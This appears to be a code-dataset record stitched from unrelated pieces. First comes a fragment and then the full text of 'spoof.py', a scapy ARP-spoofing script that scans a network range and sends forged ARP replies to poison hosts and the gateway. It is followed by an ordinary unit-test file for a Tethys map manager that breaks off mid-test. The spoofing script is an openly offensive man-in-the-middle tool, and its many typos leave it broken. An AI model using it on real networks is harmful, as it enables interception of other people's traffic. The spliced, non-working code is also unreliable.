arp_spoof(mac_target,ip_target,gateaway)
print("\r[{}+{}] Spoofing; {}".format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX, ip_target)), sys.stdout.flush()
except KeyoboardInterrupt:
print("\n\nRestoring tables ARP...")
for n in hosts:
mac_target = hosts[n]
ip_taget = n
gateway = parse.gateway
restore_arp(gateway,ip_target,mac_gatway,mac_target)
restore_arp(ip_target,gateway,mac_target,mac_gateway)
exit(0)
else:
print("I need parameters bitch")
if __name__ == '__main__':
main() | spoof.py |
from scapy.all import *
from colorama import Fore, init
import argparse
import sys
init()
parse = argparse.ArgumentParser()
parse.add_argument("-r","--range",help="Range to scan or spoof")
parse.add_argument("-g","--gateway",help="Gatewat")
parse = parse.parse_args()
def get_mac(gateway):
arp_layer = ARP(pdst=gateway)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
final_packet = broadcast/arp_layer
mac = srp(final_packet, timeout=2, verbose=False)[0]
mac = mac[0][1].hwsrc
return mac
def scanner(_range,gateway):
list_hosts = dict()
arp_layer = ARP(pdst=_range)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
final_packet = broadcast/arp_layer
answers = srp(final_packet, timeout=2, verbose=False)[0]
print("\n")
for a in answers:
if a != gateway:
print(
"[{}+{} HOST: {} MAC: {}]".format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX, a[1].psrc, a[1].hwsrc)
)
list_hosts.update({a[1].psrc: a[1].hwsrc})
return list_hosts
def restore_arp(destip,sourceip,hwsrc,hwdst):
dest_mac = hwdst
source_mac = hwsrc
packet = APR(op=2, pdst=destip, hwdst=dest_mac, psrc=sourceip, hwsrc=source_mac)
send(packet, verbose=False)
def arp_spoof(hwdst, pdst,spsrc):
spoofer_packet = APR(op=2, hwdst=hwdst, pdst=pdst, psrc=pscr)
send(spoofer_packet, verbose=False)
def main():
if parse.range and parse.gateway:
mac_gateway = get_mac(parse.gateway)
print(mac_gateway)
hosts = scanner(parse.range, parse.gateway)
try:
print("\n[{}+{} RUNNING...]",format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX))
while True:
for n in hosts:
mac_target = hosts[n]
ip_target = n
gatway = parse.gateway
arp_spoof(mac_gateway,gateway,ip_target)
arp_spoof(mac_target,ip_target,gateaway)
print("\r[{}+{}] Spoofing; {}".format(Fore.LIGHTGREEN_EX, Fore.LIGHTWHITE_EX, ip_target)), sys.stdout.flush()
except KeyoboardInterrupt:
print("\n\nRestoring tables ARP...")
for n in hosts:
mac_target = hosts[n]
ip_taget = n
gateway = parse.gateway
restore_arp(gateway,ip_target,mac_gatway,mac_target)
restore_arp(ip_target,gateway,mac_target,mac_gateway)
exit(0)
else:
print("I need parameters bitch")
if __name__ == '__main__':
main() | 0.287068 | 0.129155 |
import copy
import uuid
from collections import OrderedDict
from unittest import mock
import unittest
from tethys_gizmos.gizmo_options import MVLayer
from tethysext.atcore.services.model_database import ModelDatabase
from tethysext.atcore.services.model_db_spatial_manager import ModelDBSpatialManager
from tethysext.atcore.services.map_manager import MapManagerBase
class _MapManager(MapManagerBase):
def compose_map(self, request, *args, **kwargs):
return None
class MapManagerBaseTests(unittest.TestCase):
def setUp(self):
self.spatial_manager = mock.MagicMock(spec=ModelDBSpatialManager)
self.model_db = mock.MagicMock(spec=ModelDatabase)
self.map_manager = _MapManager(self.spatial_manager, self.model_db)
def tearDown(self):
pass
def test_map_extent_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_extent', ret)
def test_map_extent_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._map_extent = 'bar'
ret = self.map_manager.map_extent
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('bar', ret)
def test_default_view_property(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_called()
self.assertEqual('test_view', ret)
def test_default_view_property_cached(self):
self.map_manager.get_map_extent = mock.MagicMock(
return_value=('test_view', 'test_extent')
)
self.map_manager._default_view = 'foo'
ret = self.map_manager.default_view
self.map_manager.get_map_extent.assert_not_called()
self.assertEqual('foo', ret)
def test_build_layer_group(self):
ret = self.map_manager.build_layer_group(id='ID001', display_name='Foo', layers='Layer1')
self.assertEqual('Foo', ret['display_name'])
self.assertEqual('ID001', ret['id'])
self.assertEqual('checkbox', ret['control'])
self.assertEqual('Layer1', ret['layers'])
self.assertTrue(ret['visible'])
def test_build_layer_group_value_error(self):
self.assertRaises(ValueError, self.map_manager.build_layer_group,
id='ID001', display_name='Foo', layers='Layer1', layer_control='groupbox')
def test_get_wms_endpoint(self):
ret = self.map_manager.get_wms_endpoint()
self.spatial_manager.get_wms_endpoint.assert_called_with(public=True)
self.assertEqual(self.spatial_manager.get_wms_endpoint(), ret)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent(self, mock_mvv):
test_extent = [-10, -10, 10, 10]
self.spatial_manager.get_extent_for_project.return_value = test_extent
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=[0.0, 0.0],
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertEqual(test_extent, extent)
@mock.patch('tethysext.atcore.services.map_manager.MVView')
def test_get_map_extent_no_extent(self, mock_mvv):
self.spatial_manager.get_extent_for_project.return_value = None
view, extent = self.map_manager.get_map_extent()
mock_mvv.assert_called_with(
projection='EPSG:4326',
center=MapManagerBase.DEFAULT_CENTER,
zoom=MapManagerBase.DEFAULT_ZOOM,
maxZoom=MapManagerBase.MAX_ZOOM,
minZoom=MapManagerBase.MIN_ZOOM
)
self.spatial_manager.get_extent_for_project.assert_called_with(
model_db=self.model_db
)
self.assertEqual(mock_mvv(), view)
self.assertIsNone(extent)
def test_generate_custom_color_ramp_divisions(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
num_divisions=10
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_val_no_data(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
value_precision=1,
no_data_value=0,
)
expected = {
'val1': '100.0', 'color1': '#fff100',
'val2': '200.0', 'color2': '#ff8c00',
'val3': '300.0', 'color3': '#e81123',
'val4': '400.0', 'color4': '#ec008c',
'val5': '500.0', 'color5': '#68217a',
'val6': '600.0', 'color6': '#00188f',
'val7': '700.0', 'color7': '#00bcf2',
'val8': '800.0', 'color8': '#00b294',
'val9': '900.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a',
'val_no_data': 0}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_with_colors(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
color_ramp="Blue and Red"
)
expected = {
'val1': '100.00', 'color1': '#a50026',
'val2': '200.00', 'color2': '#d73027',
'val3': '300.00', 'color3': '#f46d43',
'val4': '400.00', 'color4': '#fdae61',
'val5': '500.00', 'color5': '#fee090',
'val6': '600.00', 'color6': '#e0f3f8',
'val7': '700.00', 'color7': '#abd9e9',
'val8': '800.00', 'color8': '#74add1',
'val9': '900.00', 'color9': '#4575b4',
'val10': '1000.00', 'color10': '#313695'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_first_division(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
first_division=0
)
expected = {
'val0': '100.0', 'color0': '#fff100',
'val1': '200.0', 'color1': '#ff8c00',
'val2': '300.0', 'color2': '#e81123',
'val3': '400.0', 'color3': '#ec008c',
'val4': '500.0', 'color4': '#68217a',
'val5': '600.0', 'color5': '#00188f',
'val6': '700.0', 'color6': '#00bcf2',
'val7': '800.0', 'color7': '#00b294',
'val8': '900.0', 'color8': '#009e49',
'val9': '1000.0', 'color9': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_prefix(self):
min_elevation = 100
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
prefix='foo'
)
expected = {
'foo1': '100.0', 'color1': '#fff100',
'foo2': '200.0', 'color2': '#ff8c00',
'foo3': '300.0', 'color3': '#e81123',
'foo4': '400.0', 'color4': '#ec008c',
'foo5': '500.0', 'color5': '#68217a',
'foo6': '600.0', 'color6': '#00188f',
'foo7': '700.0', 'color7': '#00bcf2',
'foo8': '800.0', 'color8': '#00b294',
'foo9': '900.0', 'color9': '#009e49',
'foo10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_top_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
top_offset=900
)
expected = {
'val1': '10.0', 'color1': '#fff100',
'val2': '20.0', 'color2': '#ff8c00',
'val3': '30.0', 'color3': '#e81123',
'val4': '40.0', 'color4': '#ec008c',
'val5': '50.0', 'color5': '#68217a',
'val6': '60.0', 'color6': '#00188f',
'val7': '70.0', 'color7': '#00bcf2',
'val8': '80.0', 'color8': '#00b294',
'val9': '90.0', 'color9': '#009e49',
'val10': '100.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_generate_custom_color_ramp_divisions_bottom_offset(self):
min_elevation = 10
max_elevation = 1000
val = self.map_manager.generate_custom_color_ramp_divisions(
min_value=min_elevation,
max_value=max_elevation,
num_divisions=10,
value_precision=1,
bottom_offset=900
)
expected = {
'val1': '910.0', 'color1': '#fff100',
'val2': '920.0', 'color2': '#ff8c00',
'val3': '930.0', 'color3': '#e81123',
'val4': '940.0', 'color4': '#ec008c',
'val5': '950.0', 'color5': '#68217a',
'val6': '960.0', 'color6': '#00188f',
'val7': '970.0', 'color7': '#00bcf2',
'val8': '980.0', 'color8': '#00b294',
'val9': '990.0', 'color9': '#009e49',
'val10': '1000.0', 'color10': '#bad80a'
}
self.assertEqual(expected, val)
def test_build_param_string_multiple_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar', baz='jar')
parts = ret.split(';')
self.assertIn('baz:jar', parts)
self.assertIn('foo:bar', parts)
def test_build_param_string_single_kwargs(self):
ret = self.map_manager.build_param_string(foo='bar')
self.assertEqual('foo:bar', ret)
def test_build_param_string_no_kwargs(self):
ret = self.map_manager.build_param_string()
self.assertEqual('', ret)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_invalid(self, _):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
self.assertRaises(ValueError, self.map_manager.build_cesium_layer, cesium_type='WrongType', cesium_json=model,
layer_name=layer_name, layer_title=layer_title, layer_variable=layer_variable)
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_model(self, mock_gvsm, mock_bvl):
model = [{'model': {'uri': 'glb_file.glb', 'show': True, 'shadows': 'enabled'},
'name': 'Funwave',
'orientation': {
'Cesium.Transforms.headingPitchRollQuaternion':
[{'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
{'Cesium.HeadingPitchRoll': [{'Cesium.Math.toRadians': -42}, 0, 0]}]},
'position': {'Cesium.Cartesian3.fromDegrees': [-95.245, 28.9341, -31]},
},
]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumModel',
cesium_json=model,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumModel',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=model,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_cesium_layer_primitive(self, mock_gvsm, mock_bvl):
primitive = [{'Cesium.Cesium3DTileset': {'url': {'Cesium.IonResource.fromAssetId': 512295}}}]
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_cesium_layer(
cesium_type='CesiumPrimitive',
cesium_json=primitive,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_source='CesiumPrimitive',
layer_id='',
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=primitive,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
show_download=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.get_vector_style_map')
def test_build_geojson_layer_all_pass_through_args(self, mock_gvsm, mock_bvl):
geojson = {
'type': 'FeatureCollection',
'features': [
{
'type': 'Feature',
'geometry': {'type': 'Point', 'coordinates': [-87.89832948468124, 30.651451015987234]},
'properties': {'id': 4}
},
]
}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_geojson_layer(
geojson=geojson,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
layer_id='LAYER_ID_PASS_THROUGH',
extent=[1, 2, 3, 4],
visible=False,
public=False,
selectable=True,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3]
)
expected_options = copy.deepcopy(geojson)
expected_options['features'][0]['properties']['layer_name'] = layer_name
mock_bvl.assert_called_once()
mock_gvsm.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='GeoJSON',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=[1, 2, 3, 4],
layer_id='LAYER_ID_PASS_THROUGH',
visible=False,
public=False,
selectable=True,
show_download=False,
plottable=True,
has_action=False,
popup_title='POPUP_TITLE_PASS_THROUGH',
excluded_properties=[1, 2, 3],
style_map=mock_gvsm()
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_all_pass_through_args(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH'
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0'
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.assert_called_with(
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
visible=False,
selectable=True,
plottable=True,
has_action=False,
extent=[1, 2, 3, 4],
public=False,
geometry_attribute='GEOM_ATTR_PASS_THROUGH',
layer_id='LAYER_ID_PASS_THROUGH',
excluded_properties=[1, 2, 3],
popup_title='POPUP_TITLE_PASS_THROUGH',
times=None,
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_not_tiled(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
tiled=False
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous'
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='ImageWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_viewparams(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
viewparams = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
viewparams=viewparams
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'VIEWPARAMS': viewparams
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
@mock.patch('tethysext.atcore.services.map_manager.MapManagerBase._build_mv_layer')
def test_build_wms_layer_env(self, mock_bvl):
endpoint = 'http://www.example.com/geoserver/wms'
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
env = 'foo:bar;baz:jar'
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager.build_wms_layer(
endpoint=endpoint,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
color_ramp_division_kwargs={'min_value': 1, 'max_value': 10, 'color_ramp': 'Blue and Red'},
env=env
)
expected_options = {
'url': endpoint,
'params': {
'LAYERS': layer_name,
'TILED': True,
'TILESORIGIN': '0.0,0.0',
'ENV': env
},
'serverType': 'geoserver',
'crossOrigin': 'anonymous',
'tileGrid': map_manager.DEFAULT_TILE_GRID
}
mock_bvl.assert_called_once()
mock_bvl.called_with(
layer_id='',
layer_name=layer_name,
layer_source='TileWMS',
layer_title=layer_title,
layer_variable=layer_variable,
options=expected_options,
extent=None,
visible=True,
public=True,
selectable=False,
plottable=False,
has_action=False,
popup_title=None,
excluded_properties=None,
geometry_attribute='geometry'
)
# IMPORTANT: Test this AFTER assert_called_with
self.assertEqual(ret, mock_bvl())
def test_build_mv_layer(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_popup_title(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
popup_title = 'Baz'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
popup_title='Baz'
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': popup_title,
'layer_variable': layer_variable,
'toggle_status': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_w_excluded_properties(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
excluded_properties = ['id', 'foo', 'bar', 'baz']
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
excluded_properties=excluded_properties
)
opts = ret['options']
expected_data = {
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'excluded_properties': ['id', 'type', 'layer_name', 'foo', 'bar', 'baz']
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_plottable(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
plottable=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name', 'plot'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'plottable': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
self.assertEqual(layer_title, ret['legend_title'])
self.assertEqual(extent, ret['legend_extent'])
self.assertEqual(False, ret['feature_selection'])
self.assertDictEqual(expected_data, ret['data'])
self.assertEqual(given_options, opts)
def test_build_mv_layer_has_action(self):
layer_source = 'GeoJSON'
given_options = {'type': 'FeatureCollection', 'features': []}
layer_name = 'foo'
layer_title = 'Foo'
layer_variable = 'Bar'
extent = [400, 300, 800, 100]
with mock.patch('tethysext.atcore.services.map_manager.MapManagerBase.map_extent',
new_callable=mock.PropertyMock) as mock_map_extent:
mock_map_extent.return_value = extent
map_manager = _MapManager(
spatial_manager=self.spatial_manager,
model_db=self.model_db
)
ret = map_manager._build_mv_layer(
layer_source=layer_source,
layer_name=layer_name,
layer_title=layer_title,
layer_variable=layer_variable,
options=given_options,
has_action=True
)
opts = ret['options']
expected_data = {
'excluded_properties': ['id', 'type', 'layer_name'],
'layer_id': layer_name,
'layer_name': layer_name,
'popup_title': layer_title,
'layer_variable': layer_variable,
'toggle_status': True,
'has_action': True
}
self.assertIsInstance(ret, MVLayer)
self.assertEqual(layer_source, ret['source'])
self.assertEqual({'visible': True, 'show_download': False}, ret['layer_options'])
